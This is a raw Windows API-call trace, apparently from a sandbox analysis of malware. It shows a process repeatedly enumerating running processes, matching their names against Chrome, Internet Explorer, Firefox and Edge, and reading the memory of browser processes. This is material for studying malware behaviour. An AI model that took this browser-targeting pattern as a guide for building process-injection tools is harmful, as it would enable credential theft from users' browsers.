	[0195.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.872] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.872] NtQueryInformationProcess (in: ProcessHandle=0x103c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.872] ReadProcessMemory (in: hProcess=0x103c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.873] ReadProcessMemory (in: hProcess=0x103c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.873] ReadProcessMemory (in: hProcess=0x103c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.873] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.873] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1040
	[0195.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.874] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.874] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.875] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.875] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.876] NtQueryInformationProcess (in: ProcessHandle=0x1040, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.876] ReadProcessMemory (in: hProcess=0x1040, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.876] ReadProcessMemory (in: hProcess=0x1040, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.876] ReadProcessMemory (in: hProcess=0x1040, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.876] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1044
	[0195.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.877] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.878] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0195.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1048
	[0195.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.879] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0195.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.879] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.880] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0195.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.880] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x104c
	[0195.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.882] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.882] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.882] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0195.884] CloseHandle (hObject=0x188) returned 1
	[0195.884] Sleep (dwMilliseconds=0x64) 
	[0195.999] GetCurrentProcessId () returned 0x110
	[0195.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0196.002] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0196.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0196.003] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0196.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1050
	[0196.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.004] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.004] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.004] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.005] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1054
	[0196.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.005] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.006] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.006] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.006] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.006] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0196.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1058
	[0196.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.007] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0196.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.008] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.008] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0196.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.008] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x105c
	[0196.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.009] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.010] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.010] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.010] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0196.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1060
	[0196.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.011] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0196.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.011] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.012] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0196.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.012] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.012] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0196.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1064
	[0196.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.013] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0196.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.013] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.014] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0196.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.014] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.014] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0196.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1068
	[0196.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.015] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0196.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.015] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.016] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0196.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.016] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.016] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0196.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x106c
	[0196.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.017] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.017] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.017] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.018] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.018] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1070
	[0196.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.019] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.019] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.020] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1074
	[0196.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.020] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.021] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.021] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.021] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1078
	[0196.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.022] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.023] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.023] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.023] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.023] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x107c
	[0196.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.024] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.025] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.025] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.025] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.025] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1080
	[0196.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.026] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.027] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.027] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.027] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1084
	[0196.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.029] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1088
	[0196.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.030] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.030] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.031] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.031] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.031] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0196.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x108c
	[0196.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.032] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0196.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.032] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.033] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0196.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.033] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.033] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1090
	[0196.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.034] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
